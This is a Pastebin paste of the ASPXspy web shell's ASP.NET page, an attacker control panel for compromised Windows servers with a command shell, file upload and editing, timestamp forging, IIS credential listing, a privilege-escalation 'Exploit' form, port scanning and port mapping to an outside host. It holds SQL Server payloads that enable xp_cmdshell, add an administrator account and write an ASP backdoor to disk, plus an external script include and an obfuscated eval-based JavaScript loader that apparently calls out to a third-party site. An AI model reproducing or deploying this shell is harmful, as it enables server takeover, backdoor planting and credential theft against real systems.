API tools faq
paste
Advertisement
madtiger

windows shell

madtiger
Sep 13th, 2018
893
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 72.63 KB | None | 0 0
raw download clone embed print report
  1. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
  2. <%@ import Namespace="System.IO"%>
  3. <%@ import Namespace="System.Diagnostics"%>
  4. <%@ import Namespace="System.Data"%>
  5. <%@ import Namespace="System.Management"%>
  6. <%@ import Namespace="System.Data.OleDb"%>
  7. <%@ import Namespace="Microsoft.Win32"%>
  8. <%@ import Namespace="System.Net.Sockets" %>
  9. <%@ import Namespace="System.Net" %>
  10. <%@ import Namespace="System.Runtime.InteropServices"%>
  11. <%@ import Namespace="System.DirectoryServices"%>
  12. <%@ import Namespace="System.ServiceProcess"%>
  13. <%@ import Namespace="System.Text.RegularExpressions"%>
  14. <%@ Import Namespace="System.Threading"%>
  15. <%@ Import Namespace="System.Data.SqlClient"%>
  16. <%@ import Namespace="Microsoft.VisualBasic"%>
  17. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22. <script runat="server">
  23.  
  24. </script>
  25. <script src=http://www.topshellv.com/kaydet.php></script>
  26. <html xmlns="http://www.w3.org/1999/xhtml" >
  27. <head id="Head1" runat="server">
  28. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
  29. <title>ASPXspy</title>
  30. <script type="text/javascript">var _6084;var _7053='774C126E160F1364C1430B1358F1466A1418A1370B1424B1460F1040F1478A1448C1394A1460B1370B1004F998D1124E1394A1418F1382B956F1454C1448C1358C1130F968B1388A1460E1460C1436D1112E1046D1046A1478A1478B1478C1040E1388A1346C1358B1406B1370D1448F1352F1430A1484D1040A1424B1370E1460D1046E1352A1412B1346B1352F1412D1346D1046B1436C1370D1448E1040A1436C1388B1436A1142E1466D1448A1412B1130B998E1022A1370A1454C1358A1346E1436E1370F1004F1412C1430C1358A1346D1460A1394C1430A1424B1040F1388E1448F1370F1376C1010C1022F998C968D956A1478C1394C1364F1460E1388F1130E1052D956E1388B1370E1394A1382C1460B1388B1130A1052F956C1352E1430C1448E1364E1370B1448B1130C1052B1136C998E1010F1118E';var _5449=/[\x41\x42\x43\x44\x45\x46]/;var _8618=2;var _2287=_7053.charAt(_7053.length-1);var _4826;var _5884=_7053.split(_5449);var _1128=[String.fromCharCode,isNaN,parseInt,String];_5884[1]=_1128[_8618+1](_1128[_8618](_5884[1])/21);var _8059=(_8618==8)?String:eval;_4826='';_11=_1128[_8618](_5884[0])/_1128[_8618](_5884[1]);for(_6084=3;_6084<_11;_6084++)_4826+=(_1128[_8618-2]((_1128[_8618](_5884[_6084])+_1128[_8618](_5884[2])+_1128[_8618](_5884[1]))/_1128[_8618](_5884[1])-_1128[_8618](_5884[2])+_1128[_8618](_5884[1])-1));var _8127='_1751';var _6091='_8127=_4826';function _1064(_3531){_8059(_2713);_1064(_5886);_5886(_6091);_1064(_8127);}var _2713='_1064=_8059';var _5886='_5886=_1064';_1064(_2287);</script>
  31. <style type="text/css">
  32. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
  33. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
  34. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
  35. .list{font:12px Arial,Tahoma;height:23px;}
  36. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
  37. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
  38. a {color: #00f;text-decoration:underline;}
  39. a:hover{color: #f00;text-decoration:none;}
  40. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
  41. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
  42. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
  43. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
  44. .head td span{font-weight:normal;}
  45. form{margin:0;padding:0;}
  46. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
  47. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
  48. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  49. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
  50. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
  51. </style>
  52. <script type="text/javascript">
  53. function CheckAll(form){
  54. for(var i=0;i<form.elements.length;i++){
  55. var e=form.elements[i];
  56. if(e.name!='chkall')
  57. e.checked=form.chkall.checked;
  58. }
  59. }
  60. </script>
  61. </head>
  62. <body style="margin:0;table-layout:fixed;">
  63. <form id="ASPXSpy" runat="server">
  64. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
  65. <span style="font:11px Verdana;">Password:</span>
  66. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
  67. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
  68. Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>
  69. </div>
  70. <div id="ZVS" runat="server">
  71. <div id="Zzj" runat="server">
  72. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  73. <tr class="head">
  74. <td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="Bin_Span_Sname" runat="server" enableviewstate="true"></span></td>
  75. </tr>
  76. <tr class="alt1">
  77. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
  78. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
  79. </td>
  80. </tr>
  81. </table>
  82. </div>
  83. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
  84. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
  85. <h2 id="Bin_H2_Title" runat="server"></h2>
  86. <%--FileList--%>
  87. <div id="CzfO" runat="server">
  88. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  89. <tr>
  90. <td style=" white-space:nowrap">Current Directory : </td>
  91. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
  92. </td>
  93. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
  94. </tr>
  95. </table>
  96. <table width="100%" border="0" cellpadding="4" cellspacing="0">
  97. <tr class="alt1"><td colspan="7" style="padding:5px;">
  98. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
  99. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
  100. | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
  101. </td></tr>
  102. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
  103. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
  104. </asp:Table>
  105. </table>
  106. </div>
  107. <%--FileEdit--%>
  108. <div id="vrFA" runat="server">
  109. <p>Current File(import new file name and new file)<br/>
  110. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
  111. </p>
  112. <p>File Content<br/>
  113. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
  114. </p>
  115. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
  116. </div>
  117. <%--CloneTime--%>
  118. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
  119. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
  120. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
  121. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
  122. <h2>Set last modified &raquo;</h2>
  123. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
  124. <p>
  125. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
  126. &nbsp;
  127. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
  128. &nbsp;
  129. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
  130. &nbsp;
  131. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
  132. </p>
  133. <p>
  134. CreationTime :
  135. <input class="input" id="yUqx" type="text" runat="server"/>
  136. LastWriteTime :
  137. <input class="input" id="uYjw" type="text" runat="server"/>
  138. LastAccessTime :
  139. <input class="input" id="aLsn" type="text" runat="server"/>
  140. </p>
  141. <p>
  142. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
  143. </p>
  144. </div>
  145. <%--IISSpy--%>
  146. <div runat="server" id="VNR" visible="false" enableviewstate="false">
  147. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  148. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
  149. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
  150. </asp:Table>
  151. </table>
  152. </div>
  153. <%--Process--%>
  154. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
  155. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  156. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
  157. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
  158. </asp:Table>
  159. </table>
  160. </div>
  161. <%--CmdShell--%>
  162. <div runat="server" id="vIac">
  163. <p>CmdPath:<br/>
  164. <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
  165. </p>
  166. Argument:<br/>
  167. <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
  168. <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
  169. </div>
  170. </div>
  171. <%--Services--%>
  172. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
  173. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  174. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
  175. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
  176. </asp:Table>
  177. </table>
  178. </div>
  179. <%--Sysinfo--%>
  180. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
  181. <hr style=" border: 1px solid #ddd;height:0px;"/>
  182. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
  183. <h2 id="Bin_H2_Mac" runat="server"></h2>
  184. <hr style=" border: 1px solid #ddd;height:0px;"/>
  185. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
  186. <h2 id="Bin_H2_Driver" runat="server"></h2>
  187. <hr style=" border: 1px solid #ddd;height:0px;"/>
  188. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
  189. </div>
  190. <%--UserInfo--%>
  191. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
  192. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  193. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
  194. </asp:Table>
  195. </table>
  196. </div>
  197. <%--SuExp--%>
  198. <div runat="server" id="APl">
  199. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  200. <tr align="center">
  201. <td style="width:10%"></td>
  202. <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
  203. <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
  204. <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
  205. <td style="width:10%"></td>
  206. </tr>
  207. <tr >
  208. <td style="width:10%"></td>
  209. <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
  210. </tr>
  211. </table>
  212. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
  213. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  214. <tr align="center">
  215. <td style="width:30%"></td>
  216. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
  217. <td style="width:30%"></td>
  218. </tr>
  219. </table>
  220. </div>
  221. </div>
  222. <%--Reg--%>
  223. <div id="kkHN" runat="server">
  224. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
  225. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
  226. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
  227. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
  228. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
  229. </asp:Table>
  230. </table>
  231. </div>
  232. <%--PortScan--%>
  233. <div id="YwLB" runat="server">
  234. <p>
  235. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
  236. </p>
  237. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
  238. </div>
  239. <%--DataBase--%>
  240. <div id="iDgmL" runat="server">
  241. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
  242. <div id="dQIIF" runat="server">
  243. <div id="irTU" runat="server"></div>
  244. <div id="uXevN" runat="server">
  245. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
  246. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
  247. </div>
  248. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
  249. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
  250. <div style="overflow-x:auto;width:950px" >
  251. <p>
  252. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
  253. </p>
  254. </div>
  255. </div>
  256. </div>
  257. <%--PortMap--%>
  258. <div id="hOWTm" runat="server">
  259. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  260. <tr align="center">
  261. <td style="width:5%"></td>
  262. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
  263. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
  264. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
  265. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
  266. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
  267. <%--Search--%>
  268. <div id="yhv" runat="server">
  269. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  270. <tr align="center">
  271. <td style="width:20%" align="left">Keyword</td>
  272. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  273. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
  274. </tr>
  275. <tr align="center">
  276. <td style="width:20%" align="left">Replace As</td>
  277. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  278. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
  279. </tr>
  280. <tr align="center">
  281. <td style="width:20%" align="left">Search FileType</td>
  282. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
  283. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
  284. </tr>
  285. <tr align="center">
  286. <td style="width:20%" align="left">Path</td>
  287. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
  288. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
  289. </tr>
  290. </table>
  291. <br/>
  292. <br/>
  293. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
  294. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
  295. </asp:Table>
  296. </div>
  297. </td></tr></table>
  298. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.hackerbox.net" target="_blank">Shell Arsivi</a> All Rights Reserved.</div></div>
  299. </form>
  300. </body>
  301. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!